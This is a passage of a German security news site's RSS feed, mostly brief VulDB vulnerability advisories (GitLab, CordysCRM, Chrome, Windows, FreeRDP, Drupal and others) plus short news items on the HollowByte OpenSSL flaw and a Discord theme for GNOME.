<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/gitlab:community_edition">GitLab Community Edition and Enterprise Edition up to 15.3.4/15.4.3/15.5.1</a> and classified as <a href="https://vuldb.com/kb/risk">critical</a>. The impacted element is an unknown function of the component <em>Job Handler</em>. Performing a manipulation results in improper authorization.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2022-3706">CVE-2022-3706</a>. The attack may be initiated remotely. There is no available exploit.

The affected component should be upgraded.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-16222 | 1Panel-dev CordysCRM up to 1.4.1 Third Party Endpoint TokenService.java mkAddress server-side request forgery (2685/2686 / EUVD-2026-45432)]]></title>
<description><![CDATA[A vulnerability classified as critical has been found in 1Panel-dev CordysCRM up to 1.4.1. This issue affects some unknown processing of the file backend/crm/src/main/java/cn/cordys/crm/integration/sso/service/TokenService.java of the component Third Party Endpoint. Performing a manipulation of t...]]></description>
<link>https://tsecurity.de/de/3679293/sicherheitsluecken/cve-2026-16222-1panel-dev-cordyscrm-up-to-141-third-party-endpoint-tokenservicejava-mkaddress-server-side-request-forgery-26852686-euvd-2026-45432/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679293/sicherheitsluecken/cve-2026-16222-1panel-dev-cordyscrm-up-to-141-third-party-endpoint-tokenservicejava-mkaddress-server-side-request-forgery-26852686-euvd-2026-45432/</guid>
<pubDate>Sun, 19 Jul 2026 12:09:57 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/1panel-dev:cordyscrm">1Panel-dev CordysCRM up to 1.4.1</a>. This issue affects some unknown processing of the file <em>backend/crm/src/main/java/cn/cordys/crm/integration/sso/service/TokenService.java</em> of the component <em>Third Party Endpoint</em>. Performing a manipulation of the argument <em>mkAddress</em> results in server-side request forgery.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-16222">CVE-2026-16222</a>. The attack may be initiated remotely. In addition, an exploit is available.

The project closed the issue report, stating that this is not the official way to report a security vulnerability.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-16150 | RobinHerbots Inputmask up to 5.0.9 Internal Deep Merge Helper extend.js extendDefaults/extendDefinitions/extendAliases prototype pollution (Issue 2885 / EUVD-2026-45394)]]></title>
<description><![CDATA[A vulnerability was found in RobinHerbots Inputmask up to 5.0.9 and classified as critical. Affected by this issue is the function extendDefaults/extendDefinitions/extendAliases in the library lib/dependencyLibs/extend.js of the component Internal Deep Merge Helper. The manipulation results in im...]]></description>
<link>https://tsecurity.de/de/3679286/sicherheitsluecken/cve-2026-16150-robinherbots-inputmask-up-to-509-internal-deep-merge-helper-extendjs-extenddefaultsextenddefinitionsextendaliases-prototype-pollution-issue-2885-euvd-2026-45394/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679286/sicherheitsluecken/cve-2026-16150-robinherbots-inputmask-up-to-509-internal-deep-merge-helper-extendjs-extenddefaultsextenddefinitionsextendaliases-prototype-pollution-issue-2885-euvd-2026-45394/</guid>
<pubDate>Sun, 19 Jul 2026 12:09:48 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/robinherbots:inputmask">RobinHerbots Inputmask up to 5.0.9</a> and classified as <a href="https://vuldb.com/kb/risk">critical</a>. Affected by this issue is the function <code>extendDefaults/extendDefinitions/extendAliases</code> in the library <em>lib/dependencyLibs/extend.js</em> of the component <em>Internal Deep Merge Helper</em>. The manipulation results in improperly controlled modification of object prototype attributes.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-16150">CVE-2026-16150</a>. The attack may be performed from remote. There is no available exploit.

The project was informed of the problem early through an issue report but has not responded yet.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-16213 | Fantomas42 django-blog-zinnia up to 0.20 Protected Entry Password entry_protection.py cleartext storage (Issue 595 / EUVD-2026-45424)]]></title>
<description><![CDATA[A vulnerability described as problematic has been identified in Fantomas42 django-blog-zinnia up to 0.20. Affected by this vulnerability is an unknown functionality of the file zinnia/views/mixins/entry_protection.py of the component Protected Entry Password Handler. The manipulation results in c...]]></description>
<link>https://tsecurity.de/de/3679140/sicherheitsluecken/cve-2026-16213-fantomas42-django-blog-zinnia-up-to-020-protected-entry-password-entryprotectionpy-cleartext-storage-issue-595-euvd-2026-45424/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679140/sicherheitsluecken/cve-2026-16213-fantomas42-django-blog-zinnia-up-to-020-protected-entry-password-entryprotectionpy-cleartext-storage-issue-595-euvd-2026-45424/</guid>
<pubDate>Sun, 19 Jul 2026 10:39:17 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">problematic</a> has been identified in <a href="https://vuldb.com/product/fantomas42:django-blog-zinnia">Fantomas42 django-blog-zinnia up to 0.20</a>. Affected by this vulnerability is an unknown functionality of the file <em>zinnia/views/mixins/entry_protection.py</em> of the component <em>Protected Entry Password Handler</em>. The manipulation results in cleartext storage of sensitive information.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-16213">CVE-2026-16213</a>. The attack needs to be approached locally. There is no available exploit.

The project was informed of the problem early through an issue report but has not responded yet.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-3691 | DeepL Pro API Translation Plugin up to 1.7.4 on WordPress information disclosure (EUVD-2022-43050)]]></title>
<description><![CDATA[A vulnerability categorized as problematic has been discovered in DeepL Pro API Translation Plugin up to 1.7.4 on WordPress. This affects an unknown function. The manipulation results in information disclosure.

This vulnerability was named CVE-2022-3691. The attack needs to be approached within ...]]></description>
<link>https://tsecurity.de/de/3679070/sicherheitsluecken/cve-2022-3691-deepl-pro-api-translation-plugin-up-to-174-on-wordpress-information-disclosure-euvd-2022-43050/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679070/sicherheitsluecken/cve-2022-3691-deepl-pro-api-translation-plugin-up-to-174-on-wordpress-information-disclosure-euvd-2022-43050/</guid>
<pubDate>Sun, 19 Jul 2026 09:38:32 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">problematic</a> has been discovered in <a href="https://vuldb.com/product/deepl_pro_api_translation_plugin">DeepL Pro API Translation Plugin up to 1.7.4</a> on WordPress. This affects an unknown function. The manipulation results in information disclosure.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2022-3691">CVE-2022-3691</a>. The attack needs to be approached within the local network. There is no available exploit.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-49165 | Microsoft Windows up to Server 2025 App Store uninitialized pointer]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, has been found in Microsoft Windows. This issue affects some unknown processing of the component App Store. Performing a manipulation results in uninitialized pointer.

This vulnerability was named CVE-2026-49165. The attack needs to be approa...]]></description>
<link>https://tsecurity.de/de/3678993/sicherheitsluecken/cve-2026-49165-microsoft-windows-up-to-server-2025-app-store-uninitialized-pointer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678993/sicherheitsluecken/cve-2026-49165-microsoft-windows-up-to-server-2025-app-store-uninitialized-pointer/</guid>
<pubDate>Sun, 19 Jul 2026 08:38:38 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">problematic</a>, has been found in <a href="https://vuldb.com/product/microsoft:windows">Microsoft Windows</a>. This issue affects some unknown processing of the component <em>App Store</em>. Performing a manipulation results in uninitialized pointer.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-49165">CVE-2026-49165</a>. The attack needs to be approached locally. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-55827 | FreeRDP up to 3.27.0 RemoteFX Decoder gdi_Bitmap_Decompress out-of-bounds write]]></title>
<description><![CDATA[A vulnerability was found in FreeRDP up to 3.27.0. It has been classified as critical. Impacted is the function gdi_Bitmap_Decompress of the component RemoteFX Decoder. Performing a manipulation results in out-of-bounds write.

This vulnerability was named CVE-2026-55827. The attack may be initia...]]></description>
<link>https://tsecurity.de/de/3678930/sicherheitsluecken/cve-2026-55827-freerdp-up-to-3270-remotefx-decoder-gdibitmapdecompress-out-of-bounds-write/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678930/sicherheitsluecken/cve-2026-55827-freerdp-up-to-3270-remotefx-decoder-gdibitmapdecompress-out-of-bounds-write/</guid>
<pubDate>Sun, 19 Jul 2026 07:39:14 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/freerdp">FreeRDP up to 3.27.0</a>. It has been classified as <a href="https://vuldb.com/kb/risk">critical</a>. Impacted is the function <code>gdi_Bitmap_Decompress</code> of the component <em>RemoteFX Decoder</em>. Performing a manipulation results in out-of-bounds write.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-55827">CVE-2026-55827</a>. The attack may be initiated remotely. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-45196 | Imagination Graphics DDK up to 26.1 RTM1 GPU Firmware out-of-bounds write]]></title>
<description><![CDATA[A vulnerability was found in Imagination Graphics DDK up to 26.1 RTM1. It has been rated as problematic. This affects an unknown part of the component GPU Firmware. Performing a manipulation results in out-of-bounds write.

This vulnerability was named CVE-2026-45196. The attack needs to be appro...]]></description>
<link>https://tsecurity.de/de/3678929/sicherheitsluecken/cve-2026-45196-imagination-graphics-ddk-up-to-261-rtm1-gpu-firmware-out-of-bounds-write/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678929/sicherheitsluecken/cve-2026-45196-imagination-graphics-ddk-up-to-261-rtm1-gpu-firmware-out-of-bounds-write/</guid>
<pubDate>Sun, 19 Jul 2026 07:39:13 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/imagination:graphics_ddk">Imagination Graphics DDK up to 26.1 RTM1</a>. It has been rated as <a href="https://vuldb.com/kb/risk">problematic</a>. This affects an unknown part of the component <em>GPU Firmware</em>. Performing a manipulation results in out-of-bounds write.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-45196">CVE-2026-45196</a>. The attack needs to be approached locally. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-57084 | Microsoft Windows up to Server 2025 File Explorer uninitialized pointer]]></title>
<description><![CDATA[A vulnerability identified as problematic has been detected in Microsoft Windows. Impacted is an unknown function of the component File Explorer. Performing a manipulation results in uninitialized pointer.

This vulnerability was named CVE-2026-57084. The attack needs to be approached locally. Th...]]></description>
<link>https://tsecurity.de/de/3678884/sicherheitsluecken/cve-2026-57084-microsoft-windows-up-to-server-2025-file-explorer-uninitialized-pointer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678884/sicherheitsluecken/cve-2026-57084-microsoft-windows-up-to-server-2025-file-explorer-uninitialized-pointer/</guid>
<pubDate>Sun, 19 Jul 2026 06:53:48 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">problematic</a> has been detected in <a href="https://vuldb.com/product/microsoft:windows">Microsoft Windows</a>. Impacted is an unknown function of the component <em>File Explorer</em>. Performing a manipulation results in uninitialized pointer.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-57084">CVE-2026-57084</a>. The attack needs to be approached locally. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-3671 | SourceCodester eLearning System 1.0 manage.php ID sql injection (EUVD-2022-43030)]]></title>
<description><![CDATA[A vulnerability marked as critical has been reported in SourceCodester eLearning System 1.0. Affected is an unknown function of the file /admin/students/manage.php. Performing a manipulation of the argument ID results in sql injection.

This vulnerability was named CVE-2022-3671. The attack may b...]]></description>
<link>https://tsecurity.de/de/3678826/sicherheitsluecken/cve-2022-3671-sourcecodester-elearning-system-10-managephp-id-sql-injection-euvd-2022-43030/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678826/sicherheitsluecken/cve-2022-3671-sourcecodester-elearning-system-10-managephp-id-sql-injection-euvd-2022-43030/</guid>
<pubDate>Sun, 19 Jul 2026 05:53:45 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">critical</a> has been reported in <a href="https://vuldb.com/product/sourcecodester:elearning_system">SourceCodester eLearning System 1.0</a>. Affected is an unknown function of the file <em>/admin/students/manage.php</em>. Performing a manipulation of the argument <em>ID</em> results in sql injection.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2022-3671">CVE-2022-3671</a>. The attack may be initiated remotely. In addition, an exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-16198 | Sipeed PicoClaw up to 0.2.9 First Run Setup access_control.go allowed_cidrs authentication bypass (Issue 3080 / EUVD-2026-45409)]]></title>
<description><![CDATA[A vulnerability marked as critical has been reported in Sipeed PicoClaw up to 0.2.9. The impacted element is an unknown function of the file web/backend/middleware/access_control.go of the component First Run Setup. Performing a manipulation of the argument allowed_cidrs results in authentication...]]></description>
<link>https://tsecurity.de/de/3678812/sicherheitsluecken/cve-2026-16198-sipeed-picoclaw-up-to-029-first-run-setup-accesscontrolgo-allowedcidrs-authentication-bypass-issue-3080-euvd-2026-45409/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678812/sicherheitsluecken/cve-2026-16198-sipeed-picoclaw-up-to-029-first-run-setup-accesscontrolgo-allowedcidrs-authentication-bypass-issue-3080-euvd-2026-45409/</guid>
<pubDate>Sun, 19 Jul 2026 05:23:53 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">critical</a> has been reported in <a href="https://vuldb.com/product/sipeed:picoclaw">Sipeed PicoClaw up to 0.2.9</a>. The impacted element is an unknown function of the file <em>web/backend/middleware/access_control.go</em> of the component <em>First Run Setup</em>. Performing a manipulation of the argument <em>allowed_cidrs</em> results in authentication bypass using alternate channel.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-16198">CVE-2026-16198</a>. The attack may be initiated remotely. In addition, an exploit is available.

Applying a patch is the recommended action to fix this issue.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-54465 | websocket-driver up to 0.8.0 HTTP Header Parser memory allocation (Nessus ID 327775)]]></title>
<description><![CDATA[A vulnerability was found in websocket-driver up to 0.8.0. It has been rated as problematic. Affected by this vulnerability is an unknown functionality of the component HTTP Header Parser. Performing a manipulation results in uncontrolled memory allocation.

This vulnerability was named CVE-2026-...]]></description>
<link>https://tsecurity.de/de/3678719/sicherheitsluecken/cve-2026-54465-websocket-driver-up-to-080-http-header-parser-memory-allocation-nessus-id-327775/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678719/sicherheitsluecken/cve-2026-54465-websocket-driver-up-to-080-http-header-parser-memory-allocation-nessus-id-327775/</guid>
<pubDate>Sun, 19 Jul 2026 03:36:30 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/websocket-driver">websocket-driver up to 0.8.0</a>. It has been rated as <a href="https://vuldb.com/kb/risk">problematic</a>. Affected by this vulnerability is an unknown functionality of the component <em>HTTP Header Parser</em>. Performing a manipulation results in uncontrolled memory allocation.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-54465">CVE-2026-54465</a>. The attack may be initiated remotely. There is no available exploit.

Upgrading the affected component is advised.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-3657 | Google Chrome Extensions use after free (EUVD-2022-43016)]]></title>
<description><![CDATA[A vulnerability has been found in Google Chrome and classified as critical. This affects an unknown part of the component Extensions. Performing a manipulation results in use after free.

This vulnerability was named CVE-2022-3657. The attack may be initiated remotely. There is no available explo...]]></description>
<link>https://tsecurity.de/de/3678635/sicherheitsluecken/cve-2022-3657-google-chrome-extensions-use-after-free-euvd-2022-43016/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678635/sicherheitsluecken/cve-2022-3657-google-chrome-extensions-use-after-free-euvd-2022-43016/</guid>
<pubDate>Sun, 19 Jul 2026 01:53:44 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/google:chrome">Google Chrome</a> and classified as <a href="https://vuldb.com/kb/risk">critical</a>. This affects an unknown part of the component <em>Extensions</em>. Performing a manipulation results in use after free.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2022-3657">CVE-2022-3657</a>. The attack may be initiated remotely. There is no available exploit.

The affected component should be upgraded.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-15901 | Google Chrome up to 150.0.7871.125 Network use after free (WID-SEC-2026-2398)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, was found in Google Chrome. Impacted is an unknown function of the component Network. The manipulation results in use after free.

This vulnerability was named CVE-2026-15901. The attack may be performed from remote. There is no available exploit...]]></description>
<link>https://tsecurity.de/de/3678629/sicherheitsluecken/cve-2026-15901-google-chrome-up-to-15007871125-network-use-after-free-wid-sec-2026-2398/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678629/sicherheitsluecken/cve-2026-15901-google-chrome-up-to-15007871125-network-use-after-free-wid-sec-2026-2398/</guid>
<pubDate>Sun, 19 Jul 2026 01:53:36 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, was found in <a href="https://vuldb.com/product/google:chrome">Google Chrome</a>. Impacted is an unknown function of the component <em>Network</em>. The manipulation results in use after free.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-15901">CVE-2026-15901</a>. The attack may be performed from remote. There is no available exploit.

You should upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-58647 | Microsoft Power BI Report Server 15.0.1103.234/15.0.1104.300 cross site scripting]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, has been found in Microsoft Power BI Report Server 15.0.1103.234/15.0.1104.300. The impacted element is an unknown function. Performing a manipulation results in cross site scripting.

This vulnerability was named CVE-2026-58647. The attack ma...]]></description>
<link>https://tsecurity.de/de/3678608/sicherheitsluecken/cve-2026-58647-microsoft-power-bi-report-server-15011032341501104300-cross-site-scripting/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678608/sicherheitsluecken/cve-2026-58647-microsoft-power-bi-report-server-15011032341501104300-cross-site-scripting/</guid>
<pubDate>Sun, 19 Jul 2026 01:22:45 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">problematic</a>, has been found in <a href="https://vuldb.com/product/microsoft:power_bi_report_server">Microsoft Power BI Report Server 15.0.1103.234/15.0.1104.300</a>. The impacted element is an unknown function. Performing a manipulation results in cross site scripting.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-58647">CVE-2026-58647</a>. The attack may be initiated remotely. There is no available exploit.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[This theme makes Discord look more at home on Ubuntu]]></title>
<description><![CDATA[The official Discord desktop app supports Linux but it doesn’t make much effort to fit in, which is why alternative clients are popular – not least because they can be themed. Discord GNOME Theme by developer ~ricewind012, is so named because, basically, that’s what it is: a custom theme that res...]]></description>
<link>https://tsecurity.de/de/3678557/linux-tipps/this-theme-makes-discord-look-more-at-home-on-ubuntu/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678557/linux-tipps/this-theme-makes-discord-look-more-at-home-on-ubuntu/</guid>
<pubDate>Sun, 19 Jul 2026 00:06:09 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="406" height="232" src="https://i0.wp.com/www.omgubuntu.co.uk/wp-content/uploads/2026/07/Vesktop-GNOME-theme.webp?resize=406%2C232&amp;ssl=1" class="attachment-post-list size-post-list wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://i0.wp.com/www.omgubuntu.co.uk/wp-content/uploads/2026/07/Vesktop-GNOME-theme.webp?resize=350%2C200&amp;ssl=1 350w, https://i0.wp.com/www.omgubuntu.co.uk/wp-content/uploads/2026/07/Vesktop-GNOME-theme.webp?resize=406%2C232&amp;ssl=1 406w, https://i0.wp.com/www.omgubuntu.co.uk/wp-content/uploads/2026/07/Vesktop-GNOME-theme.webp?resize=840%2C480&amp;ssl=1 840w, https://i0.wp.com/www.omgubuntu.co.uk/wp-content/uploads/2026/07/Vesktop-GNOME-theme.webp?zoom=3&amp;resize=406%2C232&amp;ssl=1 1218w" sizes="(max-width: 406px) 100vw, 406px">The official Discord desktop app supports Linux but it doesn’t make much effort to fit in, which is why alternative clients are popular – not least because they can be themed. Discord GNOME Theme by developer ~ricewind012, is so named because, basically, that’s what it is: a custom theme that restyles Discord to look more like Adwaita and follow the GNOME HIG (well, as close as Discord’s CSS allows). A reminder: Ubuntu’s Yaru theme is based (heavily) on upstream Adwaita, so while this theme won’t give an exact match on Ubuntu, it’s closer than stock. As it’s all CSS, it […]</p>
<p>You're reading <a href="https://www.omgubuntu.co.uk/2026/07/discord-gnome-theme-adwaita-vesktop">This theme makes Discord look more at home on Ubuntu</a>, a blog post from <a href="https://www.omgubuntu.co.uk/">OMG! Ubuntu</a>. Do not reproduce elsewhere without permission.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenSSL Fixes HollowByte Memory Exhaustion Bug]]></title>
<description><![CDATA[Okta disclosed HollowByte, an 11-byte OpenSSL flaw that lets remote attackers exhaust server memory and trigger denial-of-service attacks. Okta’s Red Team disclosed a denial-of-service vulnerability in OpenSSL they named HollowByte, and the attack payload is exactly 11 bytes. A remote,…
Read more...]]></description>
<link>https://tsecurity.de/de/3678464/it-security-nachrichten/openssl-fixes-hollowbyte-memory-exhaustion-bug/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678464/it-security-nachrichten/openssl-fixes-hollowbyte-memory-exhaustion-bug/</guid>
<pubDate>Sat, 18 Jul 2026 21:36:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Okta disclosed HollowByte, an 11-byte OpenSSL flaw that lets remote attackers exhaust server memory and trigger denial-of-service attacks. Okta’s Red Team disclosed a denial-of-service vulnerability in OpenSSL they named HollowByte, and the attack payload is exactly 11 bytes. A remote,…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/openssl-fixes-hollowbyte-memory-exhaustion-bug/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/openssl-fixes-hollowbyte-memory-exhaustion-bug/">OpenSSL Fixes HollowByte Memory Exhaustion Bug</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-39042 | MikroTik RouterOS up to 7.21.3/7.22.1 Unflattener libumsg.so unflatten integer overflow]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, has been found in MikroTik RouterOS up to 7.21.3/7.22.1. This vulnerability affects the function unflatten of the file libumsg.so of the component Unflattener. Performing a manipulation results in integer overflow.

This vulnerability was named C...]]></description>
<link>https://tsecurity.de/de/3678445/sicherheitsluecken/cve-2026-39042-mikrotik-routeros-up-to-72137221-unflattener-libumsgso-unflatten-integer-overflow/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678445/sicherheitsluecken/cve-2026-39042-mikrotik-routeros-up-to-72137221-unflattener-libumsgso-unflatten-integer-overflow/</guid>
<pubDate>Sat, 18 Jul 2026 21:24:10 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, has been found in <a href="https://vuldb.com/product/mikrotik:routeros">MikroTik RouterOS up to 7.21.3/7.22.1</a>. This vulnerability affects the function <code>unflatten</code> of the file <em>libumsg.so</em> of the component <em>Unflattener</em>. Performing a manipulation results in integer overflow.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-39042">CVE-2026-39042</a>. The attack may be initiated remotely. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenSSL Fixes HollowByte Memory Exhaustion Bug]]></title>
<description><![CDATA[Okta disclosed HollowByte, an 11-byte OpenSSL flaw that lets remote attackers exhaust server memory and trigger denial-of-service attacks. Okta’s Red Team disclosed a denial-of-service vulnerability in OpenSSL they named HollowByte, and the attack payload is exactly 11 bytes. A remote, unauthenti...]]></description>
<link>https://tsecurity.de/de/3678398/hacking/openssl-fixes-hollowbyte-memory-exhaustion-bug/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678398/hacking/openssl-fixes-hollowbyte-memory-exhaustion-bug/</guid>
<pubDate>Sat, 18 Jul 2026 20:38:45 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Okta disclosed HollowByte, an 11-byte OpenSSL flaw that lets remote attackers exhaust server memory and trigger denial-of-service attacks. Okta’s Red Team disclosed a denial-of-service vulnerability in OpenSSL they named HollowByte, and the attack payload is exactly 11 bytes. A remote, unauthenticated attacker sends that payload and the server allocates up to 131 KB of memory […]]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-55804 | Drupal up to 11.3.11 injection]]></title>
<description><![CDATA[A vulnerability marked as critical has been reported in Drupal up to 11.3.11. The impacted element is an unknown function. Performing a manipulation results in injection.

This vulnerability was named CVE-2026-55804. The attack may be initiated remotely. There is no available exploit.]]></description>
<link>https://tsecurity.de/de/3677953/sicherheitsluecken/cve-2026-55804-drupal-up-to-11311-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677953/sicherheitsluecken/cve-2026-55804-drupal-up-to-11311-injection/</guid>
<pubDate>Sat, 18 Jul 2026 14:09:28 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">critical</a> has been reported in <a href="https://vuldb.com/product/drupal">Drupal up to 11.3.11</a>. The impacted element is an unknown function. Performing a manipulation results in injection.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-55804">CVE-2026-55804</a>. The attack may be initiated remotely. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-57476 | Deloitte AI Assist for Customer API Endpoint parameters injection]]></title>
<description><![CDATA[A vulnerability has been found in Deloitte AI Assist for Customer and classified as critical. This affects an unknown function of the component API Endpoint. Performing a manipulation of the argument parameters results in injection.

This vulnerability was named CVE-2026-57476. The attack may be ...]]></description>
<link>https://tsecurity.de/de/3677883/sicherheitsluecken/cve-2026-57476-deloitte-ai-assist-for-customer-api-endpoint-parameters-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677883/sicherheitsluecken/cve-2026-57476-deloitte-ai-assist-for-customer-api-endpoint-parameters-injection/</guid>
<pubDate>Sat, 18 Jul 2026 13:09:20 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/deloitte:ai_assist_for_customer">Deloitte AI Assist for Customer</a> and classified as <a href="https://vuldb.com/kb/risk">critical</a>. This affects an unknown function of the component <em>API Endpoint</em>. Performing a manipulation of the argument <em>parameters</em> results in injection.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-57476">CVE-2026-57476</a>. The attack may be initiated remotely. There is no available exploit.

This product is available as a managed service. Users are not able to maintain vulnerability countermeasures themselves.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-54470 | Dell Unisphere for PowerMax up to 10.3.0.5 XML Parser xml external entity reference]]></title>
<description><![CDATA[A vulnerability labeled as critical has been found in Dell Unisphere for PowerMax up to 10.3.0.5. This affects an unknown part of the component XML Parser. The manipulation results in xml external entity reference.

This vulnerability was named CVE-2026-54470. The attack may be performed from rem...]]></description>
<link>https://tsecurity.de/de/3677881/sicherheitsluecken/cve-2026-54470-dell-unisphere-for-powermax-up-to-10305-xml-parser-xml-external-entity-reference/</link>
